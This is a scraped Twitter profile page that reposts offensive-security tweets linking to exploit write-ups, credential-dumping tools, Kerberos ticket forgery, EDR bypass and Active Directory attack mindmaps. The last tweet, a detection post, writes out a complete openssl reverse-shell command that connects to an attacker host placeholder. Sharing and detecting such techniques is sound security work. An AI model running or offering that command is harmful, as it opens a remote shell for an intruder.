L (@ldrloaddll) 's Twitter Profile
L

@ldrloaddll

f.

ID: 1429529127904702465

calendar_today22-08-2021 19:41:47

257 Tweet

4 Followers

622 Following

Zak (@_zaksec) 's Twitter Profile Photo

If you're interested by an alternative way to dump domain users' NT hashes and TGT without touching LSASS, take a look at the new Masky tool :) Everything is explained in this article: z4ksec.github.io/posts/masky-re… Thanks Will Schroeder, Lee Chagolla-Christensen and Oliver Lyak for their amazing work on ADCS!

k0shl (@keyz3r0) 's Twitter Profile Photo

So this is the blogpost about CVE-2022-22715 Windows Dirty Pipe, I share the root cause and exploitation on it, thanks all help from our KunlunLab and Adobe Product Security Incident Response Team. Enjoy! Blog post: whereisk0shl.top/post/break-me-… PoC: github.com/k0keoyo/my_vul…

So this is the blogpost about CVE-2022-22715 Windows Dirty Pipe, I share the root cause and exploitation on it, thanks all help from our <a href="/KunlunLab/">KunlunLab</a> and Adobe Product Security Incident Response Team. Enjoy!
Blog post: whereisk0shl.top/post/break-me-…
PoC: github.com/k0keoyo/my_vul…
Theori (@theori_io) 's Twitter Profile Photo

Our intern qwerty was destined to analyze a recent Linux kernel LPE vuln (CVE-2022-32250), a bug found and reported by fidgeting bits. Here's a brief write-up on the analysis of the bug and the exploit development. Check it out! blog.theori.io/research/CVE-2… (exploit included)

sn🥶vvcr💥sh (@snovvcrash) 's Twitter Profile Photo

🧵 (1/) Forged Tickets Thread Golden 🔑 tickets are no longer in fashion, so here’s a short memo on using Diamond 💎 (Charlie Clark) and Sapphire (Charlie Bromberg « Shutdown ») tickets with ticketer[.]py from #Impacket. At first let’s recap what we already know about Golden tickets ⤵️ #ad #kerberos

Orange Tsai  🍊 (@orange_8361) 's Twitter Profile Photo

The last part of A New Attack Surface on MS Exchange - #ProxyRelay is out! Have also left some final thoughts on the Closing part. Hope you all enjoy this journey :D blog.orange.tw/2022/10/proxyr…

x86matthew (@x86matthew) 's Twitter Profile Photo

SharedMemUtils - A simple tool to automatically find vulnerabilities in shared memory objects (commonly used for IPC in Windows services) This tool immediately uncovered potential exploitation routes in both Nvidia and Dell Audio services on my system. x86matthew.com/view_post?id=s…

SharedMemUtils - A simple tool to automatically find vulnerabilities in shared memory objects (commonly used for IPC in Windows services)

This tool immediately uncovered potential exploitation routes in both Nvidia and Dell Audio services on my system.

x86matthew.com/view_post?id=s…
mpgn (@mpgn_x64) 's Twitter Profile Photo

Dumping LSASS is such a 2020 move, let me introduce a new CrackMapExec module called Masky developed by Zak 🎉 If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT 🚀 Crazy module 🪂

Dumping LSASS is such a 2020 move, let me introduce a new CrackMapExec module called Masky developed by <a href="/_ZakSec/">Zak</a> 🎉

If you have admin privilege, the module will impersonate all users connected -&gt; ask a certificate (ADCS) -&gt; retrieve the NT hash using PKINIT 🚀

Crazy module 🪂
an0n (@an0n_r0) 's Twitter Profile Photo

remote controlling windows services (useful for rce/lateral movement) is possible not only by interacting with SMB (445) but by calling MSRPC (135+49679) also. added (fixed?) the MSRPC version in the services[.]py example for impacket, here it is: github.com/tothi/impacket…

remote controlling windows services (useful for rce/lateral movement) is possible not only by interacting with SMB (445) but by calling MSRPC (135+49679) also. added (fixed?) the MSRPC version in the services[.]py example for impacket, here it is: github.com/tothi/impacket…
Mayfly (@m4yfly) 's Twitter Profile Photo

Welcome to the new AD Mindmap upgrade ! v2022_11 will be dark only (this is too painful to maintain two versions). Thx again to : Viking and Hocine for their help 👍 Full quality and zoomable version here : orange-cyberdefense.github.io/ocd-mindmaps/i… Overview :

Welcome to the new AD Mindmap upgrade !
v2022_11 will be dark only (this is too painful to maintain two versions).

Thx again to : <a href="/Vikingfr/">Viking</a> and <a href="/Sant0rryu/">Hocine</a>  for their help 👍

Full quality and zoomable version here :
orange-cyberdefense.github.io/ocd-mindmaps/i…

Overview :
Charlie Bromberg « Shutdown » (@_nwodtuhs) 's Twitter Profile Photo

Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit. 🧑‍🍳 The Hacker Recipes thehacker.recipes/ad/movement/da…

Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.

🧑‍🍳 The Hacker Recipes thehacker.recipes/ad/movement/da…
GuidedHacking (@guidedhacking) 's Twitter Profile Photo

We are still looking to hire an extremely motivated reverse engineer to replace me as the main content creator of GH. You must be able to generate significant traffic and content at scale, ideally you would already have a YT channel which gets 10k+ view per video. GH has

an0n (@an0n_r0) 's Twitter Profile Photo

all you need to know about offensive #SCCM condensed into an awesome presentation including hands-on demos by X-Technobro from Black Hills Information Security: youtube.com/watch?v=W9PC9e…

Charlie Bromberg « Shutdown » (@_nwodtuhs) 's Twitter Profile Photo

Refreshed "pass the things" AD mindmap, the previous one was not in a dark theme (outrageous I know) ⏩ thehacker.recipes/ad/movement/nt… 💡 made with draw.io

Refreshed "pass the things" AD mindmap, the previous one was not in a dark theme (outrageous I know)

⏩ thehacker.recipes/ad/movement/nt…
💡 made with draw.io
SEKTOR7 Institute (@sektor7net) 's Twitter Profile Photo

Bypassing Crowdstrike Falcon EDR hooks with targeted algo, decomposing agent's hooking logic. Although extremely Falcon-specific, nevertheless good exercise for any maldev. Great work, inbits! #redteam inbits-sec.com/posts/in-memor…

TrustedSec (@trustedsec) 's Twitter Profile Photo

In our latest #blog, Principal Security Consultant Adam Chester 🏴‍☠️ discusses some of the post-exploitation techniques he finds useful in cloud environments, specifically #Okta. Read it now! hubs.la/Q022wWkX0

Yam Peleg (@yampeleg) 's Twitter Profile Photo

542.8 TB of high quality text: LibGen RS - 72.8 TB - 6,738,687 txt files Link: annas-archive.org/datasets/libge… Sci-Hub - 87.2 TB - 97,847,479 txt files Link: annas-archive.org/datasets/scihub LibGen IL - 208.1 TB - 16,291,414 txt files Link: annas-archive.org/datasets/libge… Z-Library - 98.8 TB -

BlackWasp (@blwasp_) 's Twitter Profile Photo

Those bad boys got new guns: - ADCS ESC12 & 13 and ESC8 from WSUS poisoning - SCCM takeover from passive server - AD Miner and SOAPHound - LDAP pass back - PXE boot attacks - Creds from third-party softs ... hideandsec.sh/books/cheatshe… hideandsec.sh/books/cheatshe… hideandsec.sh/books/cheatshe…

Sandfly Security (@sandflysecurity) 's Twitter Profile Photo

We're going to show you how to detect someone using the openssl binary on Linux as an encrypted backdoor for a living off the land technique: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s

We're going to show you how to detect someone using the openssl binary on Linux as an encrypted backdoor for a living off the land technique:

mkfifo /tmp/s; /bin/sh -i &lt; /tmp/s 2&gt;&amp;1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 &gt; /tmp/s; rm /tmp/s